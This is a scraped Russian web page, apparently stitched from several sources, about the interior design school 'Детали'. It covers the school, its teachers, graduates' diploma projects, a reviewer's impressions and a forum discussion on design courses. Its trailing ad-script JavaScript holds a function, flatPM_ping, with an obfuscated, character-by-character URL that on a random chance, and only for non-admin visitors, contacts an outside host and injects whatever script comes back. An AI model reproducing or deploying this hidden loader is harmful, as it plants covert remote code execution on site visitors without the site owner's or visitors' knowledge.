31 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Дизайн школа детали

Школа Дизайна Интерьера «ДЕТАЛИ»

Школа Дизайна Интерьера «ДЕТАЛИ» создана в 2000 году. Школа — Член Международной Ассоциации дизайнеров интерьеров (IIDA) с 2002 года, действует в соответствии с профессиональными стандартами IIDA. Философия — образование как искусство создания красоты, способной преображать жизнь.
Цель – профессиональное образование и повышение квалификации в области дизайна интерьера, предметной и внешней среды, развитие креативного мышления и творческого потенциала личности.

Базовые курсы:

Специальные курсы:

Преподаватели:

Архитектор и пейзажист Андрей Суматохин

Художник Максим Шишигин

Архитектор и пейзажист Татьяна Смирнова

Дизайнеры и пейзажисты Ирина Маркидонова
Илона Меньшакова

Историк дизайна
и дизайн-критик Ольга Косырева

Декоратор Вероника Андрихова

Дизайнер Надежда Ананьева

Художник Алена Вилюкова

Дизайнер Наталья Сохнюк

Дизайнер Ольга Амлинская

Дизайнер Ольга Полонская

Дизайнер и пейзажист Анна Пронская

Дизайнер и пейзажист Ирина Татарникова

Строитель Илья Никулин

Дизайнер Татьяна Шавлак

Дизайнер Мария Карташова

Дизайнер Александр Заболотный

Дизайнер Ираклий Зария

Архитекторы Татьяна и Дмитрий Хорошевы

Пейзажист Ольга Абрамова

Пейзажист Татьяна Аленина

Пейзажист Татьяна Губская

Пейзажист Наталия Казимирова

Пейзажист Татьяна Лебедева

Пейзажист Мария Ожерельева

Пейзажист Михаил Судаков

Пейзажист Ольга Степанова

Пейзажист Рената Яковлева

Знаменитые выпускники:

Дизайнер и декоратор Ольга Эшби

Дизайнер и декоратор Елена Андреева

Дизайнер Мария Карташова

Дизайнер и пейзажист Татьяна Губская

Декоратор и пейзажист Светлана Семинихина

Работы выпускников:

1. Дипломный проект Оксаны Панфиловой

Планировка, по условиям ее нужно было делать от руки:

Эскизы интерьеров

Борды, это такие доски, на которых декоратор собирает композицию из материалов:

2. Дипломный проект автора Крыловой (имени, к сожалению, не знаю)

Дипломная работа по курсу дизайн и декор интерьера


Эскиз гостиной.

План расстановки мебели.

Эскиз входа в столовую.

Раскладка мебели в столовой.

Ткани для оформления столовой.

Раскладка мебели для гостиной

Ткани для оформления гостиной

Раскладка мебели для кабинета.

Ткани для оформления кабинета

Раскладка мебели для спальни

Ткани для оформления спальни

Эскиз ванной комнаты.

Раскладка мебели для ванной комнаты

Ткани для оформления ванной комнаты.

в этом году нужно было придумать дом мечты декоратора Вероники Блумгрен (вообще-то невероятно сложное задание — придумать дом мечты человека, который сам всю жизнь занимается тем, что придумывает другим их идеальные интерьеры). задание очень подробное и детальное (на 4 листах А4), но личных встреч с «заказчиком» ни у кого не было. Веронике хотелось увидеть некоторый «потрепаный» эко стиль. дом построен из бу дерева, стоит в лесу. нам нужно было:
— придумать кнцепцию и название проекта
— спроектировать 1 этаж (это около 400м2)
— разработать дизайн, нарисовать эскизы и подобрать мебель к 4 помещениям — кухня-столовая, гостиная, терраса, спальня с ванной комнатой.
задание представляется на бордах (доски 70 на 100см), которые выкрашены в цвет стен дома и несут на себе информацию о всех материалах, используемых в помещении, и мебели.

Я сделала проект «Воскресный обед у Вероники Блумгрен». Каждое помещение — блюдо. гостиная — луковый суп, терраса — вареники с вишней, спальня — мятный чай, кухня — столовая — мороженое. почему воскресный? когда вы на даче с друзьями, готовите еду, то обычно все силы брошены на субботний ужин, все стараются друг друга поразить иысканностью продуктов и сложностью блюд, а в воскресенье все обедают в свое удовольствие: выспались (можно спать хоть до обеда), приготовили что-нибудь незамысловатое на гриле, достали что-то особенно вкусное из вчерашнего ужина из холодильника (то, что нужно попробовать еще разок обязательно). каждый ест то, что хочет, и тогда, когда хочется. этот принцип не в интерьере нравится — когда делаешь его для себя, а не чтобы впечатлить соседей, а еще люблю когда немного старых, но любимых вещей, перекочевывает из старого интерьера в новый.
сожалению, я была такая замотанная, что забыла попросить себя пофотографировать на защите. есть немного фото, которые я делала, когда готовила борды, чтобы потом дома на свежую голову смотреть)) (если собираетесь делать все у себя дома — готовьтесь к великому погрому, мне повезло — я нашла место вне дома и устроила там взрыв вских тряпочек и бумажек)))) все равно их выкладываю, как и мои постыдные эскизы (никогда не училась рисовать, но для диплома захотела сама сделать эскизы, а не нанимать художника, поэтому вышло что вышло))) ну и еще немного фото с защит, на которых я была.

это не все что было, но все, что сохранилось((
а это фото других проектов

Дизайн школа детали

Войти

Детали

Судьба свела меня с известной школой в лице близкой подруги, которая пол года назад поступила в Детали.
Несложно догадаться, что записанные лекции шли и в мою копилку тоже). А я всегда с интересом впитываю любые новые взгляды на профессию, в том числе далекие от того, чему нас учили в МархИ. Апогеем Курса дизайна интерьеров является дипломная работа.
Участие в «последней ночи», присутствие на защите и церемонии вручения дипломов окончательно сложили мое субьективное мнение..

Общее впечатление от школы от души приятное. Не знаю, какой нужно иметь критичный взгляд, чтобы хотя бы на один день не влюбиться в эти стены! Прекрасное место в старом особняке на Спиридоновке, с оригинальным и очень камерным содержанием — коридоры и залы напоминают старинную интерьерную лавку с намеком на монастырский стиль.

На втором этаже еще красивее!

Впечатление от школы как от образовательного учреждения сложилось не сразу, и от неоднозначности к определнности пришло только после общения со студентами, точнее студентками. Тогда я поняла, что аналогов в своей сфере у этого проекта нет, но, как говорится, «есть нюанс» 🙂

Детали имеют уже сложившуюся и в большинстве своём неизменную целевую аудиторию, которая не от сердца отрывает почти 300 тысяч на полугодовое обучение. Отсюда и стоит отталкиваться, говоря о том, в какой манере проходит обучение в школе.
Достоинств много, недостатков мало, точнее он один — «Детали» без деталей). Преподаватели (действующие дизайнеры, среди которых немало известных в кругах Elle Decor и Mezonin имен) недообъясняют практическую сторону профессии. И это продиктовано и самой аудиторией, которая не готова к более детальному восприятию и без того насыщенного нового материала, и отчасти самим принципом раскрытия информации. Мне показалось, после первичного курса девушки выходят с гламурно-наивным представлением о профессии, далекое от действительности. Но это мой взгляд. Им же полученного материала, общения с единомышленниками и нервов на дипломе вполне достаточно, чтобы раскрыть себя, расширить сознание, стать декораторами в кругу знакомых и самостоятельно заниматься дизайном следующей квартиры. Потому что в саморазвитии, подаче своей идеи и эскизной части проектирования школа дает достаточно полный объем информации.

В общем, с поставленной задачей украшать светлые, не занятые трудовыми буднями умы, знаниями о красивой профессии — Детали справляются на все 100%. При этом в школе существуют курсы повышения квалификации — для тех, кто действительно серьезен в намерении освоить или сменить профессию (набор идёт только среди выпускников базового). А также дополнительные курсы по рисунку, черчению, фотошопу, построению перспективы и т.п. Не стоит забывать, что именно отсюда вышли такие имена, как Надежда Ананьева, Светлана Арефьева, Галина Чаухан и многие другие.

Я же, в придачу к своему опыту, действительно подчерпнула много нового из полученного дружественным путем материала) Были и настоящие открытия, и просто мелочи, которых мне не хватало по части формировния общей концепции интерьера.

Что это такое «по-детальевски» — на примере работы над дипломом:

© Мария Парко. Автор всех бордов, коллажей и эскизов.

Cамый большой и полный отзыв об обучении в Деталях можно найти у Оли в ее масштабном обзоре дизайн-вузов! Очень интересно, всем советую).
В вот избранные комментарии из сообщества interiors_ru :

fox_rozmary пишет:
Изучив немного репертуар школ, я вот поняла, что они все дают ограниченный минимум. Если ты до этого закончил, например, МАРХИ, то да, Детали дадут декоративную часть, как бантик для коробочки.
Я вот была на защитах в Современной школе дизайна, и, мягко говоря, была разочарована, особенно коммерциализацией всего.

ras_svet пишет:
«. по теме поста. вообще странно читать столько обобщений, как мне кажется основанных
только на внешнем взгляде
Я проучилась в Деталях
Я работаю дизайнером интерьера
Я не призываю оценивать мой стиль, главное
Есть заказчики
для которых именно он — такой стиль им нужен и именно такой их радует
На моменте строительства все планы схемы развертки понятны рабочим
Есть завершенные объекты на которых ничего не отваливается, все работает, удобно
Мое конечно мнение но. вся тех часть проекта ну конечно важна НО
эта часть проекта может быть выполнена довольно большим кол-ом людей и эту часть
не так трудно просто понять или изучить и ..начать штамповать.
а вот сделать гармоничное пространсвто.. целостное, так чтобы человек себя там чувствовал Собой, сделать под Него. это совсем про другое
я не отменяю первое в угоду второго, просто акценты. в моей работе на вторую задачу я трачу гораздо больше внимания, сил, энергии чем на первую техническую..
и. вот как раз в Деталях. там учат видеть Красоту, учат останавливать внимание на ней и воплощать ее в пространство.»

ast_discravis пишет:
«На счет недопрофессионализма — у них сейчас первый поток будет выпускаться, который учился не полгода, а год. Годовой поток случает еще и много технических лекций — я там читал лекцию о керамической плитке, и больше говорил не о дизайне, а о техничке. Предполагаю, что и остальные материаловедческие курсы были построены схожим образом.
Имхо как раз и возникла программа потому, что руководители школы стремятся это «недо» как-то преодолеть».

po1ina пишет:
«и. вот как раз в Деталях. там учат видеть Красоту, учат!»

обучение ,курсы по дизайну и декорированию интерьера

Подскажите,пожалуйста,дорогие мастера! В каком московском учебном заведении можно закончить курсы дизайнера-декоратора? Важно,чтобы то было действительно качественное обучение опытными практикующими специалистами. Кроме того, хотелось бы получить документ по окончании и возможность трудоустройства. Кто что может посоветовать?

сейчас ни одно учебное заведение не гарантирует трудоустройства, а уж тем более в сфере дизайна интерьера. а уж тем более после курсов!

Не принципиально — курсы. Возможно и как дополнительное (второе высшее ) образование.

Даже после него никто не гарантирует, что Вы трудоустроитесь. Придется очень постараться, чтобы на этом очень занятом секторе рынка отколупать себе местечко.

Моя подруга, закончив отделение дизайна в Строгановке, пошла вот на эти курсы http://www.details-moscow.ru/ Работает декоратором сейчас. Но, у нее и первое образование было по профилю и не могу сказать, что все у нее очень гладко идет.

и как второе высшее тоже никто не гарантирует и не помогает с трудоустройством, а ведущие конторы занимающиеся интерьером вообще брезгливо относятся к дизайнерам..для них существует только специальность «архитектор»

у меня муж преподавал курсы дизайна, так вот он сказал, что за те часы, которые выделяются на курс обучения, обучиться и стать дизайнером — невозможно. А все эти курсы, выкинутые деньги на ветер и уж тем более после них, дизайнером Вы великим не станете.

Как дизайнер, отучившийся положенные 6 лет скажу честно: хорошо, но мало! У меня были замечательные педагоги — очень повезло! «Большие» архитекторы, художники, искуствоведы, доктора наук (и по дизайну в т.ч.). НО! практически все студенты с моего факультета пока учились, брали еще уроки у педагогов из МАРХИ и пр. ВУЗов, дополнительно посещали курсы. (и перед поступлением — 2 года подготовки к ВУЗу).

Просто курсы не дадут абсолютно ничего, максимум научат запудривать клиентам мозги ))) Сама профессия очень многогранная и не так проста как кажестся, потому что включает в себя все от сопромата, до психологии творчества. и очень важна конечно практика, работа в мастерских и выполнение реальных проектов в процессе обучения.

Можно пойти на курсы мыловарения, флористики, валяния из шерсти. лэмпворка наконец! Но курсы дизайна. это как курсы на хирурга )))

Надя, ну а как же курсы иностранного языка, к примеру? Ведь это тоже,необъятные просторы. Однако, их достаточно для того,чтобы с чего-то начать, а потом уже дело практики..Или я чего-то недопонимаю.

Спасибо — успокоили мои кипящие от желания учиться мозги )))))))

Значит, надо подумать о более узкой специализации. Так хочется освоить что-то новое, но не уходить далеко от основного любимого занятия, при этом ещё и корочку получить. Это всё ж-таки немаловажно. Но не все «школы» их выдают.

Я дизайнер-фрилансер. И никому ни разу мои дипломы и корочки не были интересны. Работодателя в первую очередь интересует, сможет ли реально дизайнер выполнить заказ. Даже портфолио не всегда смотрят. Просто садишься за компьютер или берешь в руки карандаш и доказываешь, на что ты способен.

Так что Ольга можно конечно начать и с курсов. А дальше много-много трудолюбия, учебы и приобретение опыта

Елена,спасибо! Вы вселили в меня надежду

Оля, года два назад я тоже «заболела» этой темой. Даже несколько месяцев отучилась в Высшей Школе Средового Дизайна при МАРХИ. Полностью согласна с девочками: безумно интересно, но невозможно объять необъятное! Этому нужно учиться всю жизнь. Есть смысл заканчивать эти курсы, если:

1. У Вас достаточно свободных денежных средств и Вы хотите интересно провести время, окунуться в атмосферу студенческой жизни (узнать что-то новое, пообщаться с практикующими дизайнерами, интерсными людьми)

2. Если Вы, в силу обстоятельств, уже практикующий дизайнер, но не имеете профильного образования (такие варианты встречаются).

Лично я получила большой творческий заряд, представление о том, какой объём знаний должен получить настоящий мастер этого дела. Кроме того, мой сын — студент-первокурсник — выбрал для себя эту специальность и у нас много тем для общения.

В любом случае, у каждого — свой путь. Пробуйте, не бойтесь ошибиться!

«Лично я получила большой творческий заряд, представление о том, какой объём знаний должен получить настоящий мастер этого дела.»

Оксана, а в перспективе что? помимо этих двух пунктиков?

Ольга, не хочу выглядеть занудой, но повторю: всё очень индивидуально. Заканчивая ВШСД при МАРХИ, вы получаете документ о профессиональной переподготовке (это не совсем второе высшее), возможность официально заниматься дизайном интерьеров, например.

Оксана,а Вы практикуете , работаете, по данному профилю после обучения? Если нет,то конкретно в Вашем случае Вы как -то ипользуете в жизни те знания,которые получили в МАРХИ?

Оля, я не практикую (в смысле зарабатывания на этом денег). Как Вы, наверное, догадываетесь, у меня под окнами не стоит очередь из заказчиков. И я их (заказчиков) очень хорошо понимаю: рынок переполнен высококвалифицированными специалистами.

Что касается обучения на курсах. Представьте себе такую модель ситуации. До обучения я вижу в журнале красивую картинку интерьера и говорю себе: я тоже так умею, пойду — поучусь и буду в шоколаде. После обучения я понимаю, что лишь умею отличать хорошие картинки от плохих (с разной степенью успеха), но уже знаю, сколько нужно вложить знаний, труда, времени, чтобы получилась такая красота. А хороший дизайнер вкладывает в интерьер и жизненный опыт, и душу, и свою философию. Я достаточно требовательно отношусь к тому, что делаю, и не могу предлагать себя в качестве дизайнера интерьеров, отучившись на курсах (и это я поняла только в МАРХИ). Например, на курсах вам предлагают сделать проект интерьера квартиры за два месяца. Этого времени не всегда хватает опытному практикующему дизайнеру. Интересная идея — это замечательно, но её ведь нужно ВОПЛОТИТЬ в жизнь. Если Вы сутками будете сидеть в инернете или носиться по городу, чтобы познакомиться с сантехникой, мебелью, отделочными материалами и т.д. которые предлагает рынок, конечно, за два месяца сможете слепить проект. Но я абсолютно уверена, что с «воплощением в жизнь» возникнут проблемы.

Короче, вопрос в том, какую планку Вы для себя ставите. Ещё раз повторю: всё очень индивидуально. Способности, степень целеустремлённости, трудолюбие, творческий потенциал, наконец, возраст, круг общения, «нужные» знакомые, да просто «счастливый случай» — всё может сыграть свою роль.

Полученные знания несомненно использую: пока делаю ремонт «по своему дизайну» в квартире, в перспективе — дача, а дальше — кто знает.

Ольга, а я, как практикующий дизайнер, могу Вам сказать, что, если Вы точно знаете, что хотите заниматься именно дизайном интерьеров (или другая специализация), то идти стоит обязательно. Все всё всегда делают в ПЕРВЫЙ РАЗ, то бишь с чего-то начинают.

Вообще, Дизайнер — это не набор знаний по определенным дисциплинам (хотя без них просто никуда), это ОБРАЗ МЫШЛЕНИЯ.

Дизайнер — это человек, который не может жить без того, чтобы что-то не придумать или не переделать.

Второй вопрос зарабатывает он на этом деньги или нет.

Если Дизайнер практикующий (т.е. получающий с клиентов деньги за свои творения), он НЕ ИМЕЕТ ПРАВА быть не профессиональным. А соответственно ему требуются достаточно фундаментальные знания в большом количестве профильных и смежных областей. Но это дело наживное, главное, чтобы эти знания к моменту необходимости в них, у Дизайнера уже были. А еще, мне кажется, что настоящий Дизайнер учится всю жизнь. Ведь эта самая жизнь не стоит на месте, а все время меняется и норовит убежать вперед. И нет никакой гарантии, что тот человек, который окончил академическую школу по дизайну и архитектуре, НО не особо следящий за изменениями в нормативных актах, например, сделает проект более грамотно, чем человек, окончивший курсы, но уделяющий достойное внимание всем подобным изменениям.

В любом случае каждый сам для себя определяет, что ему ДЕЙСТВИТЕЛЬНО ПОДХОДИТ.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика